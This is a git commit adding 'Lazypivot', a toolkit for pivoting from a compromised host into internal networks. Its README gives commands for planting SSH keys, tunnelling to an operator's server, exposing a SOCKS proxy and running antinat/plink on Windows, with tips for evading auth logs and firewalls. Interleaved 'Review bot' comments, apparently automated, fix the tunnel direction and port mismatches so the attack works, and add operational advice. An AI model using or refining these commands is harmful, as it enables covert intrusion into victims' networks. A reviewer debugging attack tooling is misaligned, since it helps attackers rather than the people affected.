fast release

Giulio 2019-12-14 19:54:14 +01:00
commit 9807d3fcb5
7 changed files with 82 additions and 0 deletions

61
Readme.md Normal file

@ -0,0 +1,61 @@
# Lazypivot
Making pivoting into internal networks easier and faster so you can focus on the real fun :)
## Principles
The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
## Linux
### Simpler
On our server
```
useradd -m -s /bin/nologin targetname
ssh-keygen -t ecdsa -f /tmp/sshkey -q -N ""
mkdir /home/targetname/.ssh
cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
chown -R targetname:targetname /home/targetname/.ssh
chmod 600 /home/targetname/.ssh/authorized_keys
cat /tmp/sshkey
```
Copy the content of /tmp/sshkey
On the compromised host
```
echo "my copied sshkey" >> /tmp/.keyfile
chmod 600 /tmp/.keyfile
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
```
Now on your server
```
ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
```
### Stealthier
We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
## Windows
Upload the package and extract it with 7z.exe.
Start the antinat binary, no admin permissions are required:
```
antinat.exe -a -cantinat.xml
```
Forward the antinat port with plink:
```
plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
```
## Tips
* Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
* [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)
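Review bot: the tunnel direction in the compromised-host command (`ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver`) is inverted. `-L` tries to bind port 22 on the compromised host itself (needs root, and the local sshd normally already holds it) and forwards it to port 2222 on your server, while the next step (`ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT`) expects port 2222 on the server to lead back to the compromised host's sshd. That is a remote forward: `-R 2222:127.0.0.1:22`, with `AllowTcpForwarding` left enabled for `targetname` in the server's sshd config. Two related points: `-D 0.0.0.0:8080` publishes an unauthenticated SOCKS proxy into the internal network on every interface of your server, so bind it to `127.0.0.1` or firewall it unless that exposure is deliberate; and the plink line in the Windows section has the same `-L`/`-R` problem plus a port mismatch with the shipped `antinat.xml` (antinat listens on 32768, the command forwards to 8080), so it should read `-R 32768:127.0.0.1:32768`. Passing `-pw "password"` also leaves the credential visible in the process list and contradicts the key-only `targetname` account set up in the Linux section; prefer `-i` with a PuTTY-format key.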

1
linux/Readme.md Normal file

@ -0,0 +1 @@
Antinat linux build TODO
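Review bot: `linux/Readme.md` is only a TODO placeholder, yet the top-level README's Stealthier section tells the reader to "upload the provided package" on Linux; either ship the Linux antinat build here or state in the main README that, for now, the package exists only for Windows and the Linux path is the plain SSH `-D` variant.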

BIN
windows/antinat.dll Executable file

Binary file not shown.

BIN
windows/antinat.exe Executable file

Binary file not shown.

20
windows/antinat.xml Executable file

@ -0,0 +1,20 @@
<?xml version='1.0'?>
<antinatconfig>
<!-- Any interface -->
<interface value='127.0.0.1'/>
<!-- Port to listen on -->
<port value='32768'/>
<!-- What security methods do we offer clients? -->
<authchoice>
<select mechanism='anonymous'/>
<select mechanism='chap'/>
<select mechanism='cleartext'/>
</authchoice>
<!-- Which connections should we accept or reject? -->
<filter>
<accept/>
</filter>
</antinatconfig>
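Review bot: the comment above `<interface value='127.0.0.1'/>` says "Any interface" but the value binds loopback only; fix the comment rather than the value. Loopback is the right choice here because the port is meant to be reached only through the SSH tunnel, and a reader who "corrects" it to 0.0.0.0 would expose a proxy that offers `anonymous` auth and has an unconditional `<accept/>` filter to every host that can reach the compromised machine. While `anonymous` is listed in `<authchoice>`, the `chap` and `cleartext` entries add no protection, since a client offering no authentication is still accepted; drop `anonymous` if you intend the other two to matter.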

BIN
windows/plink.exe Executable file

Binary file not shown.

BIN
windows/upload.zip Normal file

Binary file not shown.